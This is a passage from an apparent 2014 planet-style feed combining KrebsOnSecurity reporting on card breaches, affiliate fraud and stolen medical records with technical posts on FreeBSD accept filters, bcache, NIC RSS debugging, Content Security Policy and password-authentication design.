Several sources at financial institutions that have been helping customers battle these charges say most of those customers at one point in the past used their credit cards to donate to one of several religious, political activist, and social service organizations online. I may at some point post another story about this aspect of the fraud if I can firm it up any more.

McCoy believes that most of the fraudulent charges associated with these affiliate program Web sites are the result of rogue affiliates who are merely abusing the affiliate program to “cash out” credit card numbers stolen in data breaches or purchased from underground stores that sell stolen card data.

“My guess is these are ‘legit’ herbal affiliate programs that are getting burned by bad affiliates,” McCoy said.

Affiliate fraud was a major problem for the two captains of competing pharmacy spam affiliate programs who are profiled in my upcoming book, Spam Nation. Most of the affiliate programs featured in my book dealt with the problem of scammers trying to use stolen cards to generate phony sales by placing two-week “holds” or “holdbacks” on all affiliate commissions: That way, if an affiliate’s “purchases” generated too many chargebacks, the affiliate program could terminate the affiliate and avoid paying commissions on the fraudulent charges.

But McCoy said it’s likely that this herbal affiliate program is not employing holdbacks, at least not in any timeframe that could deter rogue affiliates from running stolen cards through the system.

“If this affiliate program doesn’t have a holdback, they are a great target for this type of fraud,” McCoy said.

As if in recognition of this problem, the herbal pill Web sites ultimately promoted in these Webspam attacks are tied to a sprawling network of thousands of similar sites, all of which come with their own dedicated customer support Web site and phone number (866- and 888- numbers). Those same support phone numbers are listed next to the fraudulent charges on customers’ monthly credit card statements. In virtually all cases, the organization names listed on these support Web sites are legally registered, incorporated companies based in Florida.

All of the banks I spoke with in researching this story said customers told them that the support staff answering the phones at the 888- and 866- numbers tied to the herbal pill sites were more than happy to reverse the fraudulent charges. The last thing these affiliate programs want is a bunch of chargebacks: Too many chargebacks can cause the merchant to lose access to Visa and MasterCard’s processing networks, and can bring steep fines.

Not that legitimate customers of these dodgy vitamin shops are in for the best customer service experience either.  Very often, ordering from one of these affiliate marketing programs invites even more trouble. A note appended in fine print to the bottom of the checkout page on all of the herbal pill sites advises: “As part of your subscription, you will automatically receive additional bottles every 3 Months. Your credit card used in this initial order will be used for future automatic orders, and will be charged $148.00 (Includes S/H).”

If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again.


Daemonische Webschleuder My Universe | 2014-09-21 19:15 UTC

Apache und Nginx gehören (zumindest laut Netcraft) zu den meistgenutzten Webservern. Wer einen der beiden genannten Webserver verwendet und als Unterbau auf FreeBSD setzt, kann beiden auch noch ordentlich Beine machen — und nebenbei die Systemlast senken. Dafür braucht man keine schwarze Magie, sondern lediglich ein Kernel-Modul1 namens accf_http. Selbiges ist übrigens keinesfalls neu; es wurde bereits mit FreeBSD 4.0 eingeführt und existiert somit schon seit guten 14 Jahren.

Dahinter verbirgt sich ein Modul der accept_filter Familie, das speziell auf das HTTP-Protokoll zugeschnitten ist. Selbiges bewirkt, dass FreeBSD's Netzwerk-Stack erst den kompletten HTTP Request entgegennimmt, bevor der entsprechende Socket der Anwendung signalisiert, dass eine eingehende Verbindungsanfrage angekommen ist. Die Logik für's parsen unvollständiger HTTP Requests kann so getrost ausgeknipst werden, da der Webserver sich darauf verlassen kann, dass hier ein vollständiger Request vorliegt.

Ein weiterer Nebeneffekt: Unvollständige Requests blockieren keinen Prozess oder Thread des Webservers, wodurch besonders der Apache Webserver vom HTTP Accept Filter profitiert. Nginx arbeitet mit nicht blockierenden Sockets und reserviert — anders als die meisten Apache MPMs — nicht für eingehende Verbindungen einen extra Thread oder Prozess, so dass Nginx durch unvollständige Requests nicht dazu getrieben wird, zusätzliche Prozesse oder Threads zu starten. Allerdings muss auch Nginx alle eingegangenen Verbindungen ständig abprüfen, um herauszubekommen, auf welcher endlich ein vollständiger Request vorliegt.

Die Ressourcenersparnis ist designbedingt bei Nginx also nicht so groß wie beim Apachen. Dadurch, dass nur vollständige Requests in der Verbindungsqueue landen, wird die Abarbeitung von Requests jedoch signifikant beschleunigt, was insbesondere dann ins Gewicht fällt, wenn die Beantwortung des Requests selbst kaum Rechenzeit benötigt (etwa weil sie aus dem Cache heraus geschieht) — eine aufwändige dynamische Webapplikation profitiert hier also weniger, da ein Großteil der Gesamtzeit der Beantwortung auf die Berechnung der Antwort entfällt, und nicht auf die Entgegennahme des Requests.

Und wie kommt man jetzt in den Genuss dieser Funktionalität? Wer den Apachen einsetzt, muss lediglich dafür Sorge tragen, dass das Kernel-Modul vor dem Start des Indianers geladen wurde, etwa indem es in /boot/loader.conf eingetragen wird:

accf_http_load="YES"  
Steht das Modul zur Verfügung oder wurde es fest in den Kernel eingebaut, nutzt Apache den Accept Filter ohne weiteres Zutun. Ist er hingegen nicht verfügbar, beschwert sich Apache sogar regelrecht mit einer Warnmeldung:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter

Nginx hingegen benötigt ein wenig Ermunterung, um auf den Accept Filter zurückzugreifen:

server {  
    listen 127.0.0.1:80 accept_filter=httpready;
    ...
}
Der Fairness halber sei aber gesagt, dass es damit alleine nicht getan ist. Um nicht nur Ressourcen zu sparen, sondern wirklich mehr Performance zu erzielen, kommt man nicht umhin, sich auch mit anderen Tuning-Optionen auseinanderzusetzen und dabei Einstellungen zu ermitteln, die zum tatsächlichen Einsatzzweck des Webservers passen. Als Stichwort seien hier die sysctl-Variablen kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace sowie net.inet.tcp.recvspace genannt. Umfangreichere Informationen dazu bietet z. B. der Network Tuning Guide auf Calomel.org.

1. Alternativ kann man den Filter auch mit options ACCEPT_FILTER_HTTP fest in den Kernel einkompilieren


Outreach Program for Women Luca Barbato | 2014-09-21 13:49 UTC

Libav participated in the summer edition of the OPW. We had three interns Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks
Katerina decided to do something radical from the start and she tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it in smaller chunks to single out false positives. The patch itself gave some spotlights to some of the most horrible code still lingering around, hopefully we’ll get to fix those part soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks, they honed their skills by reimplementing the ASF and RealMedia demuxer respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big projects) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and help others doing the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and make it work at least as well as the former), but both kind of tasks are fundamental to keep the project healthy!

In closing

All the projects have been a success and we are looking forward to see further contributions from our new members!


bcache Patrick's playground | 2014-09-21 11:59 UTC

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive I copied all data away, reformated the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The raid5 stays as it is, but gets reformated with bcache.
In code:
wipefs /dev/md0 # remove old headers to unconfuse bcache
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!


The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at tihs:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try and rebalance traffic. Trouble is, I think it's a bit buggy and it's likely not working well with generic receive offload (LRO).

What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!

 


I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.

Conclusion

If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.


Home Depot said today that cyber criminals armed with custom-built malware stole an estimated 56 million debit and credit card numbers from its customers between April and September 2014. That disclosure officially makes the incident the largest retail card breach on record.

The disclosure, the first real information about the damage from a data breach that was initially disclosed on this site Sept. 2, also sought to assure customers that the malware used in the breach has been eliminated from its U.S. and Canadian store networks.

“To protect customer data until the malware was eliminated, any terminals identified with malware were taken out of service, and the company quickly put in place other security enhancements,” the company said via press release (PDF). “The hackers’ method of entry has been closed off, the malware has been eliminated from the company’s systems, and the company has rolled out enhanced encryption of payment data to all U.S. stores.”

That “enhanced payment protection,” the company said, involves new payment security protection “that locks down payment data through enhanced encryption, which takes raw payment card information and scrambles it to make it unreadable and virtually useless to hackers.”

“Home Depot’s new encryption technology, provided by Voltage Security, Inc., has been tested and validated by two independent IT security firms,” the statement continues. “The encryption project was launched in January 2014. The rollout was completed in all U.S. stores on Saturday, September 13, 2014. The rollout to Canadian stores will be completed by early 2015.”

The remainder of the statement delves into updated fiscal guidance for investors on what Home Depot believes this breach may cost the company in 2014. But absent from the statement is any further discussion about the timeline of this breach, or information about how forensic investigators believe the attackers may have installed the malware mostly on Home Depot’s self-checkout systems — something which could help explain why this five-month breach involves just 56 million cards instead of many millions more.

As to the timeline, multiple financial institutions report that the alerts they’re receiving from Visa and MasterCard about specific credit and debit cards compromised in this breach suggest that the thieves were stealing card data from Home Depot’s cash registers up until Sept. 7, 2014, a full five days after news of the breach first broke.

The Target breach lasted roughly three weeks, but it exposed some 40 million debit and credit cards because hackers switched on their card-stealing malware during the busiest shopping season of the year. Prior to the Home Depot breach, the record for the largest retail card breach went to TJX, which lost some 45.6 million cards.


While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications regard the safety of password as essential and do their best to protect it.

In particular, the developer can affect the security of password
in three manners:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.
I will expand on each of them in order.



Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since it can be a valuable information, it should be especially protected so that even in case of unauthorized access to the system the attacker can not obtain it easily.

This could be achieved through use of key derivation functions, for example. In this case, a derived key is computed from user-provided password and used in the system. With a good design, the password could actually never leave client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best than an attacker could get is the derived key with no trivial way of obtaining the original secret.

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.
It is crucial that none of those primitives can be used without proving necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using authentication token that is sent to user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, omitting the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.

Best practices for user management of passwords

Server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage user to use best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, weak password should merely issue a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.
A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there should be a minimum length for a password, it should only focus on withstanding the first round of a brute force attack. Technically saying, any limitation actually reduces entropy since the attacker can safely omit short passwords. However, with the number of possibilities growing incrementally this doesn’t even matter.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case are the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply said, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.


The malicious software that unknown thieves used to steal credit and debit card numbers in the data breach at Home Depot this year was installed mainly on payment systems in the self-checkout lanes at retail stores, according to sources close to the investigation. The finding could mean thieves stole far fewer cards during the almost five-month breach than they might have otherwise.

A self-checkout lane at a Home Depot in N. Virginia.
Since news of the Home Depot breach first broke on Sept. 2, this publication has been in constant contact with multiple financial institutions that are closely monitoring daily alerts from Visa and MasterCard for reports about new batches of accounts that the card associations believe were compromised in the break-in. Many banks have been bracing for a financial hit that is much bigger than the exposure caused by the breach at Target, which lasted only three weeks and exposed 40 million cards.

But so far, banking sources say Visa and MasterCard have been reporting far fewer compromised cards than expected given the length of the Home Depot exposure.

Sources now tell KrebsOnSecurity that in a conference call with financial institutions today, officials at MasterCard shared several updates from the ongoing forensic investigation into the breach at the nationwide home improvement store chain. The card brand reportedly told banks that at this time it is believed that only self-checkout terminals were impacted in the breach, but stressed that the investigation is far from complete.

MasterCard also reportedly relayed that the investigation to date found evidence of compromise at approximately 1,700 of the nearly 2,200 U.S. stores, with another 112 stores in Canada potentially affected.

Officials at MasterCard declined to comment. Home Depot spokeswoman Paula Drake also declined to comment, except to say that, “Our investigation is continuing, and unfortunately we’re not going to comment on other reports right now.”


How much are your medical records worth in the cybercrime underground? This week, KrebsOnSecurity discovered medical records being sold in bulk for as little as $6.40 apiece. The digital documents, several of which were obtained by sources working with this publication, were apparently stolen from a Texas-based life insurance company that now says it is working with federal authorities on an investigation into a possible data breach.

The “Fraud Related” section of the Evolution Market.
Purloined medical records are among the many illicit goods for sale on the Evolution Market, a black market bazaar that traffics mostly in narcotics and fraud-related goods — including plenty of stolen financial data. Evolution cannot be reached from the regular Internet. Rather, visitors can only browse the site using Tor, software that helps users disguise their identity by bouncing their traffic between different servers, and by encrypting that traffic at every hop along the way.

Last week, a reader alerted this author to a merchant on Evolution Market nicknamed “ImperialRussia” who was advertising medical records for sale. ImperialRussia was hawking his goods as “fullz” — street slang for a package of all the personal and financial records that thieves would need to fraudulently open up new lines of credit in a person’s name.

Each document for sale by this seller includes the would-be identity theft victim’s name, their medical history, address, phone and driver license number, Social Security number, date of birth, bank name, routing number and checking/savings account number. Customers can purchase the records using the digital currency Bitcoin.

A set of five fullz retails for $40 ($8 per record). Buy 20 fullz and the price drops to $7 per record. Purchase 50 or more fullz, and the per record cost falls to just $6.40 — roughly the price of a value meal at a fast food restaurant. Incidentally, even at $8 per record, that’s cheaper than the price most stolen credit cards fetch on the underground markets.

Imperial Russia’s ad pimping medical and financial records stolen from a Texas life insurance firm.
“Live and Exclusive database of US FULLZ from an insurance company, particularly from NorthWestern region of U.S.,” ImperialRussia’s ad on Evolution enthuses. The pitch continues:

“Most of the fullz come with EXTRA FREEBIES inside as additional policyholders. All of the information is accurate and confirmed. Clients are from an insurance company database with GOOD to EXCELLENT credit score! I, myself was able to apply for credit cards valued from $2,000 – $10,000 with my fullz. Info can be used to apply for loans, credit cards, lines of credit, bank withdrawal, assume identity, account takeover.”

Sure enough, the source who alerted me to this listing had obtained numerous fullz from this seller. All of them contained the personal and financial information on people in the Northwest United States (mostly in Washington state) who’d applied for life insurance through American Income Life, an insurance firm based in Waco, Texas.



American Income Life referred all calls to the company’s parent firm — Torchmark Corp., an insurance holding company in McKinney, Texas. This publication shared with Torchmark the records obtained from Imperial Russia. In response, Michael Majors, vice president of investor relations at Torchmark, said that the FBI and Secret Service were assisting the company in an ongoing investigation, and that Torchmark expected to begin the process of notifying affected consumers this week.

“We’re aware of the matter and we’ve been working with law enforcement on an ongoing investigation,” Majors said, after reviewing the documents shared by KrebsOnSecurity. “It looks like we’re working on the same matter that you’re inquiring about.”

Majors declined to answer additional questions, such as whether Torchmark has uncovered the source of the data breach and stopped the leakage of customer records, or when the company believes the breach began. Interestingly, ImperialRussia’s first post offering this data is dated more than three months ago, on June 15, 2014. Likewise, the insurance application documents shared with Torchmark by this publication also were dated mid-2014.

The financial information in the stolen life insurance applications includes the checking and/or savings account information of the applicant, and is collected so that American Income can pre-authorize payments and automatic monthly debits in the event the policy is approved. In a four-page discussion thread on Imperial Russian’s sales page at Evolution, buyers of this stolen data took turns discussing the quality of the information and its various uses, such as how one can use automated phone systems to verify the available balance of an applicant’s bank account.

Jessica Johnson, a Washington state resident whose records were among those sold by ImperialRussia, said in a phone interview that she received a call from a credit bureau this week after identity thieves tried to open two new lines of credit in her name.

“It’s been a nightmare,” she said. “Yesterday, I had all these phone calls from the credit bureau because someone tried to open two new credit cards in my name. And the only reason they called me was because I already had a credit card with that company and the company thought it was weird, I guess.”

ImperialRussia discusses his wares with potential and previous buyers.
More than 1.8 million people were victims of medical ID theft in 2013, according to a report from the Ponemon Institute, an independent research group. I suspect that many of these folks had their medical records stolen and used to open new lines of credit in their names, or to conduct tax refund fraud with the Internal Revenue Service (IRS).

Placing a fraud alert or freeze on your credit file is a great way to block identity thieves from hijacking your good name. For pointers on how to do that, as well as other tips on how to avoid becoming a victim of ID theft, check out this story.


Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

Users can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.


C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

On July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to prepare its member organizations to respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the the installation of “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K System’s full statement is posted here.

ANALYSIS

C&K Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how their systems were compromised, information that could no doubt be helpful to other organizations in preventing future breaches. It’s also not clear whether the other two organizations impacted by this breach have or will disclose.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

